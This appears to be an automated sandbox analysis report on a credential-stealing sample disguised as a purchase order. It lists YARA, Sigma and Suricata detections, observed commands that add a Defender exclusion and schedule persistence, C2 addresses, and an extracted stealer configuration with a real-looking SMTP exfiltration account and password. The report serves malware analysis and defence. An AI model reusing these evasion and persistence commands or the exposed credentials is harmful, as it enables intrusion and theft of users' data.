13.2.RegSvcs.exe.2a50ee8.3.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
13.2.RegSvcs.exe.3d3cdf0.12.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
13.2.RegSvcs.exe.3d3cdf0.12.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
13.2.RegSvcs.exe.3d3cdf0.12.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
13.2.RegSvcs.exe.3d3cdf0.12.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xe391:$a1: get_encryptedPassword 0xe6cd:$a2: get_encryptedUsername 0xe11e:$a3: get_timePasswordChanged 0xe23f:$a4: get_passwordField 0xe3a7:$a5: set_encryptedPassword 0xfd77:$a7: get_logins 0xfa28:$a8: GetOutlookPasswords 0xf806:$a9: StartKeylogger 0xfcc7:$a10: KeyLoggerEventArgs 0xf863:$a11: KeyLoggerEventArgsEventHandler
13.2.RegSvcs.exe.3d3cdf0.12.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x135a9:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x12aa7:$a3: \Google\Chrome\User Data\Default\Login Data 0x12db5:$a4: \Orbitum\User Data\Default\Login Data 0x13bad:$a5: \Kometa\User Data\Default\Login Data
13.2.RegSvcs.exe.3c96458.13.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
13.2.RegSvcs.exe.3ccfd90.11.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
13.2.RegSvcs.exe.2b90000.5.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
13.2.RegSvcs.exe.3ccfd90.11.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
13.2.RegSvcs.exe.2a50000.4.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
13.2.RegSvcs.exe.3d3cdf0.12.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
13.2.RegSvcs.exe.3d3cdf0.12.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
13.2.RegSvcs.exe.3d3cdf0.12.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
13.2.RegSvcs.exe.3d3cdf0.12.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x10191:$a1: get_encryptedPassword 0x281b1:$a1: get_encryptedPassword 0x104cd:$a2: get_encryptedUsername 0x284ed:$a2: get_encryptedUsername 0xff1e:$a3: get_timePasswordChanged 0x27f3e:$a3: get_timePasswordChanged 0x1003f:$a4: get_passwordField 0x2805f:$a4: get_passwordField 0x101a7:$a5: set_encryptedPassword 0x281c7:$a5: set_encryptedPassword 0x11b77:$a7: get_logins 0x29b97:$a7: get_logins 0x11828:$a8: GetOutlookPasswords 0x29848:$a8: GetOutlookPasswords 0x11606:$a9: StartKeylogger 0x29626:$a9: StartKeylogger 0x11ac7:$a10: KeyLoggerEventArgs 0x29ae7:$a10: KeyLoggerEventArgs 0x11663:$a11: KeyLoggerEventArgsEventHandler 0x29683:$a11: KeyLoggerEventArgsEventHandler
13.2.RegSvcs.exe.3d3cdf0.12.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x153a9:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x2d3c9:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x148a7:$a3: \Google\Chrome\User Data\Default\Login Data 0x2c8c7:$a3: \Google\Chrome\User Data\Default\Login Data 0x14bb5:$a4: \Orbitum\User Data\Default\Login Data 0x2cbd5:$a4: \Orbitum\User Data\Default\Login Data 0x159ad:$a5: \Kometa\User Data\Default\Login Data 0x2d9cd:$a5: \Kometa\User Data\Default\Login Data
13.2.RegSvcs.exe.400000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 3D 88 44 24 2B 88 44 24 2F B0 72 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
13.2.RegSvcs.exe.2a50ee8.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
13.2.RegSvcs.exe.3d24dc0.10.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
13.2.RegSvcs.exe.3d24dc0.10.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
13.2.RegSvcs.exe.3d24dc0.10.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
13.2.RegSvcs.exe.3d24dc0.10.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x10191:$a1: get_encryptedPassword 0x281c1:$a1: get_encryptedPassword 0x401e1:$a1: get_encryptedPassword 0x104cd:$a2: get_encryptedUsername 0x284fd:$a2: get_encryptedUsername 0x4051d:$a2: get_encryptedUsername 0xff1e:$a3: get_timePasswordChanged 0x27f4e:$a3: get_timePasswordChanged 0x3ff6e:$a3: get_timePasswordChanged 0x1003f:$a4: get_passwordField 0x2806f:$a4: get_passwordField 0x4008f:$a4: get_passwordField 0x101a7:$a5: set_encryptedPassword 0x281d7:$a5: set_encryptedPassword 0x401f7:$a5: set_encryptedPassword 0x11b77:$a7: get_logins 0x29ba7:$a7: get_logins 0x41bc7:$a7: get_logins 0x11828:$a8: GetOutlookPasswords 0x29858:$a8: GetOutlookPasswords 0x41878:$a8: GetOutlookPasswords
13.2.RegSvcs.exe.3d24dc0.10.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x153a9:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x2d3d9:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x453f9:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x148a7:$a3: \Google\Chrome\User Data\Default\Login Data 0x2c8d7:$a3: \Google\Chrome\User Data\Default\Login Data 0x448f7:$a3: \Google\Chrome\User Data\Default\Login Data 0x14bb5:$a4: \Orbitum\User Data\Default\Login Data 0x2cbe5:$a4: \Orbitum\User Data\Default\Login Data 0x44c05:$a4: \Orbitum\User Data\Default\Login Data 0x159ad:$a5: \Kometa\User Data\Default\Login Data 0x2d9dd:$a5: \Kometa\User Data\Default\Login Data 0x459fd:$a5: \Kometa\User Data\Default\Login Data
13.2.RegSvcs.exe.2752d86.2.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
13.2.RegSvcs.exe.3c95570.9.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 51 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 1276, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 1784, ProcessName: powershell.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Grinnellia.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Grinnellia.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Grinnellia.vbs" , ProcessId: 6152, ProcessName: wscript.exe

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\drivers\AppVStrm.sys, NewProcessName: C:\Windows\System32\drivers\AppVStrm.sys, OriginalFileName: C:\Windows\System32\drivers\AppVStrm.sys, ParentCommandLine: , ParentImage: , ParentProcessId: -1, ProcessCommandLine: , ProcessId: 4, ProcessName: AppVStrm.sys

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ProcessId: 1276, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 13:00 /du 23:59 /sc daily /ri 1 /f, CommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 13:00 /du 23:59 /sc daily /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 1276, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 13:00 /du 23:59 /sc daily /ri 1 /f, ProcessId: 1644, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Grinnellia.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Grinnellia.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Grinnellia.vbs" , ProcessId: 6152, ProcessName: wscript.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 1276, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 1784, ProcessName: powershell.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe, ProcessId: 6468, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Grinnellia.vbs

Suricata Signatures

ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-22T18:55:15.181990+0100	2051649	1	A Network Trojan was detected	192.168.2.5	54833	1.1.1.1	53	UDP

ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-22T18:55:11.476965+0100	2051648	1	A Network Trojan was detected	192.168.2.5	50806	1.1.1.1	53	UDP

ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-22T18:55:03.629635+0100	2018141	1	A Network Trojan was detected	54.244.188.177	80	192.168.2.5	49705	TCP
2024-11-22T18:55:11.552423+0100	2018141	1	A Network Trojan was detected	44.221.84.105	80	192.168.2.5	49711	TCP
2024-11-22T18:55:18.217849+0100	2018141	1	A Network Trojan was detected	18.141.10.107	80	192.168.2.5	49717	TCP
2024-11-22T18:56:53.180105+0100	2018141	1	A Network Trojan was detected	47.129.31.212	80	192.168.2.5	49935	TCP
2024-11-22T18:56:56.026204+0100	2018141	1	A Network Trojan was detected	13.251.16.150	80	192.168.2.5	49942	TCP
2024-11-22T18:57:06.464922+0100	2018141	1	A Network Trojan was detected	34.246.200.160	80	192.168.2.5	49971	TCP

ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-22T18:55:03.629635+0100	2037771	1	A Network Trojan was detected	54.244.188.177	80	192.168.2.5	49705	TCP
2024-11-22T18:55:11.552423+0100	2037771	1	A Network Trojan was detected	44.221.84.105	80	192.168.2.5	49711	TCP
2024-11-22T18:55:18.217849+0100	2037771	1	A Network Trojan was detected	18.141.10.107	80	192.168.2.5	49717	TCP
2024-11-22T18:56:53.180105+0100	2037771	1	A Network Trojan was detected	47.129.31.212	80	192.168.2.5	49935	TCP
2024-11-22T18:56:56.026204+0100	2037771	1	A Network Trojan was detected	13.251.16.150	80	192.168.2.5	49942	TCP
2024-11-22T18:57:06.464922+0100	2037771	1	A Network Trojan was detected	34.246.200.160	80	192.168.2.5	49971	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-22T18:55:11.295030+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49710	132.226.8.169	80	TCP

ETPRO MALWARE Win32/Expiro.NDO CnC Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-22T18:55:03.504209+0100	2850851	1	Malware Command and Control Activity Detected	192.168.2.5	49705	54.244.188.177	80	TCP
2024-11-22T18:56:28.107099+0100	2850851	1	Malware Command and Control Activity Detected	192.168.2.5	49833	82.112.184.197	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: PO #09465610_GQ 003745_SO-242000846.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://54.244.188.177/V	Avira URL Cloud: Label: phishing
Source: http://54.244.188.177/f	Avira URL Cloud: Label: phishing

Antivirus detection for dropped file

Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	Avira: detection malicious, Label: W32/Infector.Gen

Found malware configuration

Source: 13.2.RegSvcs.exe.3d54e10.14.raw.unpack

Malware Configuration Extractor: MassLogger {"EXfil Mode": "SMTP", "From": "info2@j-fores.com", "Password": "london@1759", "Server": "s82.gocheapweb.com", "To": "info@j-fores.com", "Port": 587}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: PO #09465610_GQ 003745_SO-242000846.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: PO #09465610_GQ 003745_SO-242000846.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.5:49712 version: TLS 1.0

Source:	Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: alg.exe, 00000003.00000003.2571726187.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: PO #09465610_GQ 003745_SO-242000846.exe, 00000000.00000003.2053758653.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: alg.exe, 00000003.00000003.2635972950.0000000001430000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2627279177.00000000014E0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2625776656.00000000014C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: alg.exe, 00000003.00000003.2225655829.00000000014D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: alg.exe, 00000003.00000003.2390711215.0000000001570000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: alg.exe, 00000003.00000003.2390711215.0000000001570000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ADelRCP_Exec.pdb source: alg.exe, 00000003.00000003.2405957851.0000000001570000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mavinject32.pdbGCTL source: alg.exe, 00000003.00000003.2700657166.00000000004A0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2696751735.0000000000490000.00000004.00001000.00020000.00000000.sdmp, MavInject32.exe.3.dr
Source:	Binary string: d:\dbs\el\omr\target\x86\ship\licensing\x-none\ospprearm.pdb source: OSPPREARM.EXE.3.dr
Source:	Binary string: MicrosoftEdgeUpdateBroker_unsigned.pdb source: MicrosoftEdgeUpdateBroker.exe.3.dr
Source:	Binary string: _.pdb source: RegSvcs.exe, 0000000D.00000002.2136041654.0000000002711000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2137004258.0000000002A50000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2139311354.0000000003C95000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000018.00000002.2290135083.000000000398F000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: crashreporter.pdb source: alg.exe, 00000003.00000003.2847166658.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: plugin-container.pdb source: alg.exe, 00000003.00000003.2933295512.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Grinnellia.exe, 00000008.00000003.2095158890.0000000004AB0000.00000004.00001000.00020000.00000000.sdmp, Grinnellia.exe, 00000008.00000003.2093103078.0000000004910000.00000004.00001000.00020000.00000000.sdmp, Grinnellia.exe, 0000000B.00000003.2113799471.0000000004910000.00000004.00001000.00020000.00000000.sdmp, Grinnellia.exe, 0000000B.00000003.2123309552.0000000004B10000.00000004.00001000.00020000.00000000.sdmp, Grinnellia.exe, 00000016.00000003.2239183248.00000000050E0000.00000004.00001000.00020000.00000000.sdmp, Grinnellia.exe, 00000016.00000003.2231355284.0000000004990000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: alg.exe, 00000003.00000003.2361122927.0000000001570000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdbAAAGCTL source: alg.exe, 00000003.00000003.2566964234.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: alg.exe, 00000003.00000003.2670954388.0000000000490000.00000004.00001000.00020000.00000000.sdmp
